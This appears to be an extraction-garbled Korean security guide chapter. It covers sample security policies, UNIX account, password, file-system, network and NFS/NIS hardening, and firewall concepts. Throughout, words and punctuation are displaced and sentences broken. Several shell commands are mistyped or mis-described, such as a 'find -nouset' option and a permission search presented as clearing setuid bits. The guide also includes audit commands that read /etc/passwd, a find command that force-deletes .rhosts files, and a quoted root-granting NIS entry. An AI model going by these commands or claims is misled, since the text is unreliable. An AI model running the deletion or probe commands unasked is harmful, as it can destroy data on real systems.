즉 정보보호 방침도 계층적으로 작용할 단계별 정보보호 방침이 요구되는 것이다 어떠한.
조직의 정보시스템 관련 최상위의 정보보호 방침을 예를 들면 다음 표 과 같다< 4-1> .
표 기관의 최상위 정보보호 방침 예제< 4-1>
정보보호 방침[ ]이 정보보호 방침은 예제 기업내 정보기술 및 자산에 대한 보호 가 목적이다.○정보기술 및 자산이란 컴퓨터 전산망 등 관련한 모든 하드웨어 소프트웨어 인원 등의, , ,○
고형 및 무형자산과 환경을 의미한다.이러한 정보기술 및 자산에 대한 접근은 명시된 사람만이 접근 할 수 있다.○정보기술 및 자산에 대한 접근을 통제하는 수단과 절차는 항상 이루어져야 한다.○불법적인 접근 및 훼손 변조 및 유출 경우 법적인 제재를 포함하여 제재가 이루어져야,○
한다.이러한 정보기술 및 자산에 대한 정보보호를 담당할 인적 물리적 논리적 대책을 강구, ,○
하여야 한다.여기에서 정의한 정보보호 방침에 대한 구체적인 대책은 별도로 규정한다.○정보기술 및 자산에 대한 방침은 잘 지킬 수 있도록 내부적으로 널리 알려지고 주기적○
으로 교육해야 한다.이 정보보호방침이 잘 지켜지고 있는지 정기적 비정기적 감사가 이루어져야 한다, .○
그러면 이러한 최상위 정보보호 방침에 의해 어떠한 구체적인 세부방침이 이루어져야 하는
지 사례를 통해 알아본다 이러한 정보보호방침은 단순한 사례일 뿐 어떠한 기관에서 이를.
적용하려면 앞서 소개된 정보보호관리 방법에 의해 보안위험 분석 등 적절한 절차를 통해
이루어져야 한다 표 에서 구체적 상세 정보보호방침 사례를 보여주고 있다. < 4-2> .
표 구체적 정보보호 방침< 4-2>
시스템의 접근과 이용에 관한 방침[ ]
어떠한 경우라도 하나의 계정에 한사람만 사용하여야 한다.○
타인의 계정에 불법적인 접근을 하여서는 안 된다.○
어떠한 사용자라 할지라도 한달 이상 사용하지 않을 경우 이를 관리자에게 보고하고○
적절한 조치를 할 수 있도록 하여야 한다.
각 사용자는 관리자가 규정한 패스워드의 생성 및 주기적 교체 등의 패스워드 정책을○
준수해야 한다.
관리자는 해독하기 어려운 패스워드 생성 방법과 이의 교체 주기를 정해야 한다.○
타인의 패스워드는 어떠한 경우라도 해독하려해서는 안 된다.○
사용자는 시스템에서 정의한 식별과 인증절차를 따라야 하며 관리자는 필요시 시스템○
의 사용자 식별과 인증절차를 보다 우수하게 만들 의무가 있다.
자신의 파일 디렉토리를 특수한 경우를 제외하고는 타인이 접근 할 수 없도록 유지해야,○
한다.
우연히 타인의 파일 디렉토리에 접근했다 하여도 이를 열람 수정 훼손해서는 안 된다, , , .○
자신의 중요한 정보는 암호화나 백업 등을 통해 스스로 보호해야 한다.○
각 사용자는 시스템의 정상적인 운영을 위해 노력하여야 한다.○
각 사용자는 자신에게 허용된 사용환경을 잘 이해하고 이에 따라야하며 시스템을 필요,○
이상으로 무리를 가하는 작업을 피해야 한다.
외부의 프로그램을 가져올 경우에게 저작권과 바이러스 등을 점검하고 필요한 경우에○
는 관리자의 협조를 구하여야 한다.
보안사고 및 이의 처리에 관한 방침[ ]
관리자는 보안사고에 대비한 상세 운영 지침을 마련하고 이를 준수하여야 한다.○
관리자는 보안사고에 대비하여 시스템의 운영상태에 대한 자동기록 을 수(Log/Auditing)○
행하고 이를 보존하여야 한다.
관리자는 불법사용자 불법프로그램 불법작업의 유무를 가려내기 위한 감시를 일일 주, , ,○
간 월간 등의 주기에 따라 시행하여야 한다, .
관리자는 외부전산망과의 연결시 보다 구체적인 정책을 세워 접근을 허용할 곳과 허용○
치 않을 곳을 나누어 운영해야 한다.
관리자는 외부에서 불법 접근할 수 있는 시스템을 취약요소들을 항상 막아야 한다.○
외부의 보안 사고나 내부에서 출발한 보안사고로 인한 외부기관에서의 기록요청에 대○
해서 협조할 것인지 아닌지에 대한 결정을 내릴 수 있는 권한을 명시하여야 한다.
불법침입자 등에 의한 보안사고 발생시 상황에 따라 다른 처리절차를 규정해 두어야○
한다.
이러한 처리절차는 몰아내고 대비하기 감시하며 추적하기 등으로 나누어 마련한다1) , 2) .○
만약 불법침입자를 고발한다면 이러한 결정권자 협조할 수 있는 기관의 연락처 등을,○
명시하여야 한다 불법침입자에 대한 기술적 협조 상대기관에 대한 정보를 획득할 수 있. ,
는 방법과 기술이 마련되어야 한다.
기타 지침[ ]
○ 관리자는 시스템의 백업지침을 마련해야 한다.
관리자는 개인프라이버시를 보장할 수 있는 지침을 마련한다.○
전자우편 네트워크뉴스 등에서 논란의 여지가 많은 내용에 대한 지침을 마련하고 이를,○
어떻게 준수할 것인지 방법을 명시하여야 한다.
사용자가 정보보호지침을 잘 이행할 수 있도록 교육과 홍보 방법과 주기 등을 명시한○
다.
정보보호지침을 잘 준수하는지 감사할 수 있는 관리적 기술적 방법을 명시하여야 한,○
다.
사용자나 관리자가 지침을 어길 경우 어떠한 제재를 할 수 있는지 이의 결정은 누가,○
하는지 명시하여야 한다.
여기에서 설명하고 있는 정보보호 방침은 모든 상황을 모두 고려한 완전한 것이 아니며 또,
한 매우 정확한 내용도 아니다 다만 이러한 식으로 방침을 마련할 수 있다는 사례를 열거.
한 것뿐이다.
제 절 유닉스 시스템 정보보호 지침2
유닉스 시스템 및 인터네트 정보보호 모델1.
인터네트에서 가장 많이 사용되는 시스템은 단연히 유닉스이다 가장 보안이 취약하다고 알.
려진 기종에서의 기술적 정보보호 대책을 설명한다 기종은 현재 개방형 시스UNIX . UNIX
템으로 각광받고 있는 시스템이며 인터네트에서는 연구 및 개발환경에 적합한 엔지니어링,
워크스테이션에 많이 보급되어 있다.
대부분의 유닉스시스템은 인터네트에서의 기본 통신프로토콜인 TCP/IP (Transmission
을 시스템의 기본 유틸리티로 제공하고 있으며 특히 워Control Protocol/ Internet Protocol) ,
크스테이션에서는 용 인터넷을 장착하고 있어 인터네트의 주요 통신서버로서 많이 이LAN
용되고 있다 하지만 보안에 매우 취약하여 인터넷웜 사건에는 주요 피해 기종이기도 하였.
다 현재 인터네트에 접속된 기관은 대부분 다음 가지 방법으로 내부전산망을 인터네트에. 2
연결하게 된다.
그림 게이트웨이호스트를 이용한 인터네트 접속 방법[ 4-1-1]
그림 기관의 인터네트 연결 방법< 4-1>
그림 과 같은 방법으로 인터네트에 연결하는데 라우터에 의한 방법과 게이트웨이< 4-1> ,
호스트를 이용하는 방법에서 차이점이란 게이웨이호스트는 라우터가 해야하는 내부망과 외
부망과의 연결점과 내부 및 외부간의 데이터 전송 및 경로배정 역할을 대신하는 것 뿐이다.
하지만 라우터는 통신상의 능력이 뛰어나 고속의 링크에 연결 할 수 있으나 게이트웨이에
의한 방법은 고속의 링크에 적합하지 않으므로 현재 어느 정도 규모가 있는 기관들은 거의
라우터에 의해 연결하는 방법을 사용하고 있다 어떠한 방법이든 어떤 기관내부의 자원1-1 .
을 인터네트로 부터의 불법적인 침입에 대비하기위한 다음 그림 와 같은 다단계 정< 4-2>
보보호 모델을 적용할 수 있다.
그림 인터넷트 유닉스 정보보호 모델< 4-2> /
각 계층에 대한 용약 설명은 표 과 같다< 4-3> .
표 인터네트 유닉스 정보보호 다단계 모델 요약< 4-3> /
계층 계층명 설명
1 외부접점 외부와 연결된 통신 회선 모템 등의 보안,
2 패킷필터링 패킷 내용에 의한 접근 제어
3 게이트웨이 응용계층수준의 보안인증로그등, ,
4 게이트웨이 기관 내부망사이의 격리보호,
5 내부랜 내부망 상의 호스트 보안LAN
6 내부랜 사용자 및 관리자 교육 및 인식 제고
7 보안정책 보안정책
계정 및 패스워드 보호2.
보통 해커들의 초보 기본적으로 시도하는 해킹 방법으로서 계정과 패스워드를 알아내어 원/
하는 시스템에 접근할려고 시도하며 이후에는 시스템관리자의 권한을 얻으려고 한다 그러.
므로 계정과 패스워드 시스템의 보호가 가장 기본적으로 중요한데 쉬우면서도 가장 관리,
가 소홀하다고 볼 수 있다 정보보호정책에 따라 패스워드의 길이 패스워드등의 길이 패스. , ,
워드의 구성요건 등을 지정하고 계정을 타인에게 이양하는 것을 금지한다고 하여도 사용자,
들이 정보보호에 대한 인식이 제고되지 않으면 이의 실천이 어려우므로 사용자들에 대한 정
기적인 교육과 지침시달이 필요 할 것이다 사실은 그렇게 하더라도 항상 문제는 발생할 소.
지가 있으므로 이를 지원하는 도구를 설치하여 정기적으로 체크하고 불법침입 흔적이 없는
지 감시하여야 한다 우선 계정에 대한 정보 보호 대책을 살펴보고 패스워드 보호방법에 대.
해 살펴본다.
가 계정 보호.
파일에 사용자의 계정과 패스워드 및 계정관리를 위한 여러 정보들이 저장되/etc/passwd/
며 이 파일은 모든 사용자에게 공개된다 이 파일의 항목형식은 다음과 같다, . /etc/passwd .
userid:passwd:uid:gid:comment:home_directory:shell_name
계정 보호를 위해서는 먼저 사용하지 않는 계정을 잘 감시하여야 한다 퇴직자 휴가자 출. , ,
장자등 등의 직원 계정에 대한 관리가 잘 이루어지는지를 점검하는데 얼마동안 사용할 수,
잇는지 점검한다 사용하지 않는 기간을 미리 정의하여 이 기간동안 계정을 사용하지 않으.
면 계정을 폐쇄하거나 잠정 폐쇄할 수 있도록 조치한다 라는 용 도구는 이, . chkacct UNIX
러한 정책을 지원할 수 있다.
손님계정 으로서 등 보통 패스워(Guest Account) guest, public, demo, sonnim, anonymous
드가 없거나 패스워드가 계정이름과 같은 계정을 운영하는 경우가 많은데 필요한 경우에만
사용하고 항상 없앤다 패스워드없는 계정으로서는 등을. who, date, lpq, telnet, shutdown
사용하기도 하는데 이를 운영해서는 안되며 특히 를 로 하여 사용하는 경우는 문제, UID “0”
가 되므로 항상 지운다 이러한 계정을 찾는 방법은 다음과 같다. .
$ awk -F: '$2=="" ' /etc/passwd
그 밖에 잘알려진 계정으로서 등은 필요성 여부를 판단하여vendor, service,sysdiag,wheel
불필요한 것은 없애고 필요한 것은 남기되 를 로 해서는 안된다 또한 가 인UID “0” . UID “0”
계정은 이외에는 가급적 모두 없애야 한다root .
$ awk -F: '$3==0' /etc/passwd
파일내용이 다음과 같을 경우 으로 과 가 가능하므로 모두 없애/etc/passwd UID "0" login su
야한다.
#### COMMENTS #### ::0:::::
그리고 일반 사용자들이 계정관리 정책을 모르거나 의도적으로 무시하여 여러명의 사용자가
하나의 계정을 사용하는 경우들이 있는데 꼭 이렇게 사용해야할 필요가 있다면 /etc/group
에 각각의 사용자를 등록하여 사용하도록 한다.
는 의 로서Yellow Pages Sun Micro System, Inc NIS(Network Information System) Trusted
환경에서 여러시스템 정보들을 공동관리하는 기능이다 패스워드 파일과 그LAN (Domain) .
룹파일에 를 남기게 되면 패스워드 없는 빈 계정이 가 인 로서의 권한을 가“+“ UID ”0“ root
지게 되어 시스템이 그냥 개방되는 결과를 초래하므로 주의해야한다.
+::0::: # passwd file-
+: # group file -
나 패스워드의 보호.
의 패스워드 시스템은 올바른 사용자인지 인증하는 매우 중요한 기능이다 사용자의UNIX .
패스워드는 라는 미국의 표준 암호알고리즘을 이용하는데DES(Data Encryption Standard) ,
사용자가 입력한 패스워드를 를 이용 암호화하여 에 보관하고 시 입crypt() , /etc/passwd login
력 받은 것을 암호화하여 저장된 것과 비교하는 방법을 취한다 하지만 이 알고리즘은 잘.
알려져 있으며 알고리즘 자체의 문제점이 제기되기도 하였으며 이라는 도구는 손쉬crack
운 패스워드를 쉽게 알아내기도 하므로 패스워드를 만들 때 주의를 기울여야 한다 잘못된.
패스워드를 살펴보면
계정이름이나 이를 변경한 것,○
같은 문자의 연속 반복○
인명 유명인 친구 본인 이름등 지명( , , ),○
영어 단어○
그리고 위의 것들의 조합○
등이며 바람직한 패스워드를 살펴보면,
영문 대소문자 섞은 것,○
특수기호 포함한 것,○
자 또는 최대 글자 수 를 모두 사용한 것8 ( ) ,○
빨리 입력할 수 있는 것,○
잘 잊어버리지 않는 것,○
쉽게 짐작할 수 없는 것○
이 있다.
바람직한 패스워드의 실제 사례들 들자면 다음과 같다.
시나 성경구절 등에서 인용,○
전혀 단어가 되지 않는 것 자음 모음의 조합 의성어 등 등( , ), (Wawoo )○
간단한 문장을 줄인다. (Love is True, --> lvitrue)○
단어를 조합하여 대소문자 특수문자를 섞는다2 , . (boOk sKi),○ ^
한글을 영문키보드에서 사용한다 단 사랑 등과 같은 것은 일반적인 단어는 피한. ( , (sarang)○
다)
패스워드는 언젠가는 조합으로 풀 수 있으므로 주기적으로 사용자가 패스워드를 바꾸도록,
하거나 다음과 같이 주기를 강제적으로 줄 수 있다 이러한 기능은 계열이. System V
나 등을 설치해서 사용하면 된다passwd npasswd, passwd+ .
최소 일에서 최대 일 까지# passwd -x 3 -n 30 chlim 3 30
현재 강제적으로 바꾸게 함# passwd -f chlim
패스워드 만기 일 전부터 경고# passwd -w 3 chlim 3
다 계정감시.
사용자들에 대한 기록을 면 히 살펴 봄으로로서 계정의 상황을 판단 할 수 잇다 다음은.
로그 파일에 대한 설명이다.
관련 기록 파일/var/log/syslog Mail
최종 확인/usr/adm/lastlo Login Time
현재 사용자들의 리스트/etc/utmp
등의 기록 파일/etc/wtmp login,reboot,shutdown
(usr/adm/wtmp)
관련 기록 파일/usr/adm/messages login
관련 기록 파일/usr/adm/sulog su login
현재까지 사용자들의 사용 기록 파일/var/adm/pacct
파일시스템 보안3.
가 파일 시스템 개요. UNIX
시스템의 정보보호에서 파일 시스템에서의 보안은 가장 필수적이다 침입자가 어떠한UNIX .
경로로 시스템에 침입했던 간에 그는 미래의 침입을 위해서 뒷문 을 만들기도, (back door)
하며 혹은 후에 또 다른 호스트에 침입하기 위해 또는 현재 시스템에서 관리자의 권한을, ,
훔치기 위해 트로이 목마 등의 불법 프로그램과 같은 흔적들을 남긴다 이러(Trojan Horse) .
한 이유로 파일 시스템의 점검이 필요하고 당신의 시스템이 위험하다면 이러한 점검은 더, ,
욱더 자주 이루어져야 한다.
나 파일 접근권한. (Permission Mode)
먼저 파일의 접근권한 설정에 대해 본다 다음과 같이 명령어의 에 의해 파일의 접, . ls option
근권한을 볼 수 있다.
% ls -1
total 59
-rwxr-xr-x 1 staff 59154 jul 23 20:29 a.out
-rw-r--r-- 1 staff 57 jul 23 20:29 test.c
일반 파일의 경우 가 설정되어 있으면 각각 그 파일을 읽거나 쓰거나 실행시킬 수r,w,x , ,
있으며 디렉토리 경우 가 설정되어 있으면 각각 그 디렉토리에 있는 내용을 나열시키, r,w
거나 그 디렉토리에 파일이나 다른 디렉토리를 생성시킬 수 있다 또 가 설정된 경우 해, . x
당 디렉토리에 접근할 수 있다 즉 그 디렉토리로 혹은 할 수 있다. cd chdir .
에서 각 사용자는 에 기록된 특정한 와 를 갖게 된다 는 이러한UNIX /etc/passwd uid gid . id
와 를 출력하는 명령어이다uid gid .
% id
uid=13(chlim) gid=10(staff)
그런데 운영체제는 실제 와 실효 두 가지를 가UNIX ID(real user id) ID(effective user id)
지고 있다 현재 실행되는 프로세스는 실제 가 무엇이든 실효 가 이면 그 프로세스는. ID ID 0
가 할 수 있는 모든 일을 할 수 있다root .
% su
Password : ********
# id
uid=13(chlim) gid=10(staff) euid=0(root)
# ls -ld /
drwxr-xr-x 18 root 1024 Aug 2 15:36 /
# mkdir /test
# ls -ld
drwxr -xr-x 2 root 512 Aug 6 00:16 /test
#
운영체제는 일반 사용자에게 특별한 목적을 가지고 권한을 부여할 필요가 있을 때가UNIX
있다 예를 들어 일반 사용자가 자신의 패스워드를 바꾸기 위해 를 수정하거나. /etc/passwd ,
다른 사용자에게 을 보낼 때 프라이버시를 보장하기 위해 특정한 파일의 소유주를 바꾸mail
고 접근권한을 바꾸기 위해 루트의 권한이 필요하다 이러한 목적으로 와 가. setuid setgid
사용된다.
파일에 비트가 설정되어 있을 경우 이 프로그램을 실행하게 되면 실행되는 프로세setuid , ,
스의 실효 는 그 파일 프로그램 의 소유주의 를 얻게 된다 그런데 이 장치의 문제점uid ( ) id .
은 프로그램이 특정한 일을 마치고 끝나야만 하는데 만일 계속해서 일반 사setuid/setgid ,
용자가 이렇게 권한이 주어진다면 문제가 될 수 있는 것이다.
비트가 설정된 파일은 보안문제를 야기시키므로 다음과 같은 방법으setuid, setgid, sticky
로 파악하여 수시로 지운다.
$ cd /
$ find .-perm -4000 -o -perm -2000 -depth -print >aaa
사용자가 생성하는 파일의 모드는 로 지정될수 있는데 일반 사용자는 로 지정하umask , 022
고 는 또는 필요에 따라 로 지정한다, root 022 077 .
라 파일. device
먼저 등은 결코 다른 사용자들에의해 읽혀져서는 안되므/dev/kmem, /dev/mem,/dev/drum
로 그룹 지원시에는 열거된 파일들의 소유자는 나 그룹으로 모드는, kmem root kmem , 640
으로 지정한다 이 지원되지 않을 때에는 소유는 모드는 으로 한다. kmem root, 600 .
디스크 디바이스인 등의 소유자는 그룹은 모/dev/sd0a, /dev/xylb, /dev/rst0 root, operator,
드는 으로 조정하며 터미널만 제외하고는 가 소유토록 해야한다640 , root .
마 파일시스템 모니터링.
주로 명령어로 무허가로 가 설정된 파일을 찾아야 하는데 실find setuid, setgid, sticky bit ,
행 결과 특히 에 있는지 필해 점검해야 한다 그리고/etc, usr/bin, usr/ucb, /usr/etc .
등과 같은 파일에 비티가 설정된 경우는/usr/etc/restore setuid
$ find /-perm -2 -depth -print > bbb
으로 비트를 지운다 계정에 없는 소유자 또는 그룹명이 없는 그룹파일은. ,
$ find / -nouset -o -nogroup -print -depth >ccc
으로 찾는다 파일시스템의 효과적인 모니터링을 위해 파일 시스템에는 점검 목록을 만들어.
둔 후 수시로 점검하는데 다음을 이용한다, .
$ ls -aslgR /bin /etc /usr > ddd
$ /s -aslgR /bin /etc /usr > eee
어느정도 시간이 지난뒤에( )
$ diff ddd eee > fff
파일 시스템 백업은 보다는 를 사용하며 매달 회 이상 수준의 덤프와cpio, tar dump 1 “0” 2
주에 회정도의 부분 덤프를 실시하도록 한다1 .
네트워크 보호4.
가 신뢰받는 호스트하에서의 정보보호.
파일들은 네트워크에 접속된 상대편 시스템을 신뢰하는 방.netrc, .rhosts, /etc/hosts.equiv
법을 제공하여 패스워들를 체크하지 않게 되므로 가능한 사용하지 않도록 한다 이것을 찾.
아서 없애려면 다음을 이용한다.
# cd /
# find .-name ".rhosts " -o -name ".netrc" -print -depth₩
-exec rm -f ₩;{}
# rm /etc/hosts.equiv
나 파일. /etc/inetd.conf
네트워크 서비스를 정의하는 구성 파일인데 적절히 수정하면 네트워크에서 서비스 요청 내,
용을 조절하여 불법적인 접근을 시도하는 행위를 적절히 통제할 수 있다 즉. finger, shell,
등은 보안상 문제를 야기할 수 있으무로 이를 막고자 한다면login, exec, tftp
파일내의 해당되는 서비스 엔트리를 으로 코멘트 처리하고 다시 를/etc/inetd.conf # inetd
실행시킨다 일반적으로 이 파일에 정의되지 않은 임의의 뒷문 프로그램을 정. (Back Door)
의하는 경우가 있으므로 자주 관리하는 것이 좋다.
# ps-aux | grep inetd
의# kill -9 <inetd pid>
# /usr/etc/inetd
다. FTP (File Transfer Protocol)
는 데몬을 사용하여 로그 관리를 하도록하고 디렉토리의 모드가 항상 읽기만 가FTP ftpd ,
능 하도록 조정되도록 한다 사용자수를 제한하는 것이 좋은데 다음 방법(read only) . FTP
을 이용한다.
$ vi /etc/ftpusers
root
daemon
.
.
.
$ chmod 600 /etc/ ftpusers
라 전자 우편. (Email)
전자우편 시스템인 은 인터넷 웜 에서 이용된 보안 취약점등과 같sendmail (Internet Worm)
은 많은 문제점들을 가지고 있으므로 최신 버전으로 교체하여야 하며 을 설치할, sendmail
경우 고려할 사항은 다음과 같다.
혹은 에서 를 제거한다1) /etc/aliases /usr/ucd/aliases “decode" .
만약 프로그램에 메일을 보내는 경우 쉘 명령을 메시지로 보내는 방법을 사용하지 않도2)
록 한다.
에서 명령을 사용치 못하게 한다3) sendmail.cf “wizard" , "debug" .
점검 방법은 다음과 같다.
$ telnet [local host] 25
.
.
debug
.
.
이때 에 으로 응답시 새 버전으로 교체“debug" ”200 Debug set"
마 다이얼 모뎀. (Dialup Modem)
에서는 패스워드와 관련된 다음과 같은 중요한 파일이 있으며 패스워드 관리 방법에SVR4
의해 관리한다.
/etc/dialups : terminal device list
암호화된/etc/d_passwd : pw
바 터미널.
을 위해서 파일에서 를 제외하고는 모든 의 를 지Secure Terminal /etc/ttytab root tty secure
우고 ,
#kill -HUP 1
을 실행한다.
사 네트워크 감시.
다음은 네트워크를 감시할 수 있는 방법들입니다.
를 이용1) Syslog
로그파일을 이용2) /usr/adm/messages
명령을 사용3) netstat
네트워크 트래픽 감시에는 명령을 사용4) etherfind ,tcpdump ,
로그 사용 새 버전을 설치할 경우5) ftp ( )
의 엔트리를 다음과 같이 수정한다- /etc/inetd.conf FTP .
ftp stream tcp nowait root /etc/ftpd ftpd -1
파일을 수정한다-/etc/syslog.conf .
daemon.info name -of-ftp-logfile
네트워크 파일 시스템에서의 보호5.
가. NFS (Network File System)
에서는 다음과 같은 파일이 있다NFS .
외부로 마운트되는 파일시스템을 정의-/etc/exports :
에 의해 유지되는 네트워크 그룹을 정의-/etc/netgroup : Yellow Page
파일의 내용과 주의점을 본다/etc/exports .
# vi /etc/exports
/-access = client-hostname, root = zzz
.
.
/home -access = host 1 : host 2 : host 3
.
.
/export /root/client -access=client1,root=client 1
.
먼저 위로부터 두 개의 엔트리에서 내용이 변경되어 있거나 가 없는지“-access = keyword"
살펴야 하며 보통 서버가 클라이언트의 를 로 인식하지만 마지막 엔트리에 의, root nobody ,
해 클라이언트의 로 접근이 가능하므로 유의해야한다 모니터링을 위해서는root . NFS
등을 사용하고 가 실행될 때는 또는 파일에서의showmount, nfswatch , NFS exports( dfstab)
모든 파일 시스템상에서 을 쓰며 구성하에서 파일시스템을 마운트할-access option , NFS
경우 옵션을 사용하도록 한다nosuid .
나. NIS
의 패스워드파일에서 엔트리를 없애고 또는 로 변경하며NIS Client “+::0:::” , +:*:0::: +: , NIS
서버의 패스워드파일에서는 행을 없앤다 그리고 맵 파일은 관리자만 쓸 수“+::0:::” . , NIS
있도록 모드를 설정한다.
다. RFS (Remote file Sharing Services)
를 실행할 때는 모든 명령에 대해 옵션을 사용해야 하며 의 모니터RFS share -access , RFS
링은 또는 또는 를 사용한다idroad dfshares, nsquery dfmounts, rmntstat .
제 절 인터네트 방화벽 시스템 활용방안3
개요1.
인터네트 방화벽 시스템은 어떤 한 도메인의 기관 네트워크 보호를 위해 현재로서 최선의
해결을 제공하는 방법중 하나이다 물론 이 방화벽 시스템을 구현하는 것이 충분한 보장을.
해준다고는 볼 수 없으나 가장 효과적이고 비용이 비교적 저렴하게 드는 방법이라고 볼 수
있는 것이다 방화벽 시스템의 기본적인 개념과 구현 및 관리 그리고 방화벽시스템 제품들. ,
에 대해 소개한다.
방화벽시스템의 기본 개념2.
방화벽의 원래 의미는 건물에서 발생한 화재가 더 이상 번지는 것을 막는 것이다 이러한.
의미를 인터넷에서 쓴다면 이는 네트워크의 보안 사고나 문제가 더 이상 확대되는 것을 막
고 격리하려는 것으로 이해 될 수 있다 특히 어떤 기관 내부의 네트워크를 보호하기 위해.
외부에서의 불법적인 트래픽 유입을 막고 허가되고 인증된 트래픽만을 허용하려는 적극적,
인 방어 대책임을 알 수 있다.
방화벽 개념의 정당성을 다음 정리들에서 찾아보기로 한다.
정리 아무리 우수한 방법론에 의해 만들어진 프로그램이라 할 지라도 결국 사람에 의해A.
만들어 졌으므로 버그가 있기 마련이며 이 버그는 결국 보안 취약점이 된다,
정리 프로그램을 실행시키지 않으면 보안문제는 없다B. .
정리 모든 컴퓨터는 많은 프로그램을 실행한다C. .
정리 만약 보안문제를 최소화하려면 컴퓨터는 최소한의 프로그램을 실행하여야 할 것이D.
다.
정리 에 이의가 없다면 현재 모든 컴퓨터는 보안 문제를 거의 피할 수 없는 현실임A, B, C
을 알게 된다 만약 정리 에 의해 하나의 시스템만 그러한 환경을 갖추고 외부와 내부와의. D
트래픽에서 불순한 의도의 트래픽을 걸러준다면 다른 대다수의 시스템에 대해 안전을 보장
할 수 있을 것이다.
위험지대 는 안전지대 의 반대용어가 된다 만약 위의 정리에(Zone of Risk) (Zone of Safty) .
의해 현재 그대로의 내부 네트워크를 투명하게 외부 네트워크와 연결한다면 내부 네트워크
는 그야말로 전체적으로 위험지대인 것이다 이때 투명하다는 의미는 내부 네트워크가 외부.
인터네트와 논리적으로 구조가 같아 내부 사용자나 외부 사용자 사이에 아무런 제약없이 상
호 접근할 수 있어 어떤 사용자들에게는 우수한 네트워크로 인식될 것이다 하지만 외부 인.
터네트의 해커나 침입자와 같은 불법 사용자들에게는 아무런 제약조건이 없는 투명한 환경
은 내부의 네트워크에 손쉽게 접근하여 소위 해킹을 즐기거나 정보를 불법으로 빼내 스파,
이 짓을 할 수 있는 것이다.
방화벽시스템의 기본 목표는 네트워크 사용자에게 투명성을 보장하지 않음으로써 약간의 제
약을 주더라도 위험지대를 줄이려는 적극적인 정보보호대책을 제공하려는 것이다 다음 그. <
림 은 일반적인 인터네트와의 접속 방법을 사용하고 있는 네트워크를 보여주고 있으4-3>
며 그림 의 경우에는 외부와 내부 네트워크 사이의 유일한 경로에 방화벽시스템을, < 4-4>
두고 방화벽시스템이 정보보호서비스를 제공하도록 하므로써 불법적인 트래픽을 거부하거나
막을 수 있는 것이다 물론 투명성을 보장하지는 않지만 내부의 네트워크를 안전지대로 만.
들 수 있는 것이다.
그림 투명한 접근으로 인한 위험지대화< 4-3>
하지만 그림 에서와 같이 방화벽시스템을 구축하였다 하여도 완벽하게 안전하다고< 4-4>
할 수는 없다 왜냐하면 불법침입자들은 이제 투명하게 접근하기는 어려워도 방화벽시스.
템에 접근한 뒤 내부전산망에 접근하려고 할 것이기 때문이다 보통 이것을 건너뛰기 공.
격 이라고 하는데 그래서 보통 방화벽시스템은 해당 시스템 내(Island Hopping Attack) ,
부로 침입자가 들어올 수 없도록 가능한 안전한 시스템으로 만들게 된다 보통 불필요한.
네트워크 응용서비스을 없애고 각종 에디터 컴파일러 명령어 등을 없애 단순히 방화벽시, ,
스템 기능을 위한 프로그램만을 실행하도록 운영한다 이는 위의 정리 에 따르는 내용이. D
다.
방화벽시스템 조차 정보보호에 문제가 있을 수도 있는가 대답은 그렇다 이다 그래서? “ ” .
일부 개발자나 업체에서는 시스템을 외부에 공개하여 침입하도록 광고하고 침입에 성공한
해커에게 상금을 걸기도 하는데 이렇게 하여 정보보호 기능을 높이고자 하는 것이다, .
방화벽시스템을 구축한 경우 이를 운영하는 정책이 요구되는데 이 정책은 그 기관이 표,
명하는 인터네트 정보보호정책이 된다 예를 들어 이 정책은 우선 처음 단계가 외부에서.
내부로 또 내부에서 외부로 가는 모든 트래픽을 막는데서 출발해야 한다 그런 후에 다음, .
과 같은 절차로 하나씩 허용해 간다.
가 허용할 네트워크 응용서비스들을 열거한다 예를 들어 전자우편 터미널 파일전송 월. . , , ,
드와이드 웹 등일 것이며 등은 허용하지 않을 것이다(WWW) , finger, tftp, NFS .
나 허용할 네트워크와 호스트 등을 열거한다 외부에서 내부로 혹은 내부에서 외부로 통. .
신이 허용된 네트워크와 호스트를 정의하는 것이다.
이와같이 설정된 정책은 방화벽시스템을 설치하거나 구성할 때 그대로 반영하여 방화벽시
스템을 운영하게 된다 허용할 네트워크나 호스트의 확장 등과 같은 정책의 변경은 방화.
벽시스템 운영시 지속적으로 반영하여 유지할 수 있다.
방화벽시스템의 구성요소3.
방화벽시스템에 대한 각종 토론이 이루어지는 그룹들에 의해 방화벽시스템에 대한 일반적
인 용어 정의와 개념들을 정리하였다 방화벽시스템이 가지는 다양한 기능과 정보보호 대.
처 수준에 따라 여러가지 종류의 방화벽시스템이 존재할 수 있으나 일반적으로 방화벽시,
스템의 종류를 구분하였으며 이는 방화벽시스템 개발자 운영자 그리고 컨설팅 업체들이, , ,
거의 모두 동의하고 있는 개념이다.
가 스크리닝 라우터. (Screening Router)
어떤 기관이 인터네트에 접속하려는 경우 대부분 라우터 라는 인터네트 패킷을 전(Router)
달하고 경로지정 을 담당하는 장비를 사용하게 된다 라우터는 매우 단순한 경우(Routing) .
가 아니라면 보통 패킷 헤더의 내용을 보고 여과 스크리닝 할 수 있는 능력을 가지고 있( )
다 네트워크 수준의 데이터그램에서는 출발지 주소 및 목적지 주소. IP(Internet Protocol)
에 의한 스크리닝 수준의 패킷에서는 네트워크 응, TCP(Transmission Control Protocol)
용서비스을 판단케 해주는 포트 번호에 의한 스크리닝 프로토콜별 스크리닝 등의(Port) ,
기능을 제공할 수 있다 이 스크리닝 라우터만을 가지고도 어느 정도 수준의 보안 접근제.
어를 통해 방화벽시스템 환경을 구현할 수 있으나 라우터에서 구현된 펌웨어의 수준으로
는 제한점이 많고 복잡한 정책을 구현하기 어려우므로 보통 스크리닝 라우터와 다음에서
설명하는 베스쳔호스트를 함께 운영한다.
나 베스쳔호스트. (Bastion Hosts)
베스쳔호스트는 방화벽시스템이 가지는 기능 중 가장 중요한 기능을 제공한다 원래 베스.
쳔 은 중세 성곽의 가장 중요한 수비부분을 의미한다 이 베스쳔호스트는 방화벽(Bastion) .
시스템 관리자가 중점 관리해야할 시스템이다 그래서 방화벽시스템의 중요 기능으로서.
접근제어 및 응용서비스 게이트웨이로서 가상서버 의 설치 인증 로그등을(Proxy Server) , ,
담당하게 된다 따라서 이 호스트는 외부의 침입자가 주로 노리는 시스템이 되므로 일반.
사용자의 계정을 만들지 않고 해킹의 대상이 될 어떠한 조건도 두지 않는 가장 완벽한,
시스템으로서 운영되어야 한다 보통 판매되는 방화벽시스템은 이러한 베스쳔호스트의 기.
능을 제공하는 것이라고 보면 된다.
다 이중네트워크호스트. (Dual-Homed Hosts)
복수 네트워크 호스트는 개 이상의 네트워크에 동시에 접속된 호스트를 말하며 보통 게2 ,
이트웨이호스트라고 말하는 시스템이 된다 이중네트워크란 두개의 네트워크 즉 외부네트. ,
